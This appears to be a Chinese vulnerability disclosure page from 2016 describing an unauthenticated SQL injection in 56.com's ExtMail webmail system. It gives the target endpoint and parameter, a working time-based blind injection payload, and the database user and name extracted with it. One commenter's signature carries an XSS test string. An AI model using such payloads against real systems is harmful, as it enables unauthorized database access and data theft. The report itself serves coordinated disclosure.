漏洞概要
关注数(24)
关注此漏洞
漏洞标题:56网ExtMail邮件系统前台SQL注入漏洞(不需要登录)
提交时间:2016-05-12 16:25
修复时间:2016-06-26 17:10
公开时间:2016-06-26 17:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2016-05-12: 细节已通知厂商并且等待厂商处理中
2016-05-12: 厂商已经确认,细节仅向厂商公开
2016-05-22: 细节向核心白帽子及相关领域专家公开
2016-06-01: 细节向普通白帽子公开
2016-06-11: 细节向实习白帽子公开
2016-06-26: 细节向公众公开
简要描述:
56网ExtMail前台SQL注入漏洞(不需要登录),针对数据库使用Mysql的版本
详细说明:
#1 注入点
http://corp.56.com/extman/cgi/index.cgi
#2 注入参数
username,
#3 payload, 判断用户名的第一位字符ascii是否大于104,如果正确,页面将延迟返回
username=admin' AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23&=ring&password=ring
漏洞证明:
#4 利用,获取数据库用户名
user()
webwan@localhost
databse()
extmail
修复方案:
版权声明:转载请注明来源 猪猪侠@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2016-05-12 17:04
厂商回复:
感谢支持。
最新状态:
暂无
漏洞评价:
评价
-
2016-05-12 16:26 |
迪南 ( 普通白帽子 | Rank:540 漏洞数:109 | 我真是一个大菜比)
-
2016-05-12 16:30 |
Dracul ( 路人 | Rank:17 漏洞数:8 | ⊙_⊙)
-
2016-05-12 16:30 |
子非海绵宝宝 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2016-05-12 16:31 |
凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头,倒是那些空壳却昂着...)
-
2016-05-12 16:36 |
小白猫 ( 路人 | Rank:30 漏洞数:11 | <script>alert(/xss/)</script>)
-
2016-05-12 16:43 |
prolog ( 普通白帽子 | Rank:944 漏洞数:197 )
-
2016-05-12 16:45 |
Samehere5 ( 路人 | Rank:0 漏洞数:1 | 学无止境)
-
2016-05-12 16:46 |
adminss ( 路人 | Rank:30 漏洞数:19 | ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇...)
-
2016-05-12 16:51 |
apple ( 路人 | Rank:10 漏洞数:7 | 这个苹果非常懒,只留下一颗果核)
-
2016-05-12 17:13 |
王若伊 ( 路人 | Rank:25 漏洞数:6 | )
-
2016-05-12 17:34 |
乐乐 ( 普通白帽子 | Rank:253 漏洞数:74 | 一名信息安全员)
-
2016-05-12 17:37 |
Any3ite ( 路人 | Rank:26 漏洞数:12 | 土耳其web 国内的我就看看不说话)
-
2016-05-12 22:34 |
wybang ( 普通白帽子 | Rank:199 漏洞数:56 | wybang)
-
2016-05-13 08:29 |
爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢,一生只够爱一个人。)
-
2016-05-13 10:52 |
spr1ngbr0ther ( 路人 | Rank:4 漏洞数:1 | Eternal of life is made by believing Spr...)
-
2016-05-23 18:52 |
苍生劫 ( 路人 | Rank:10 漏洞数:3 | 专治疑难杂症!)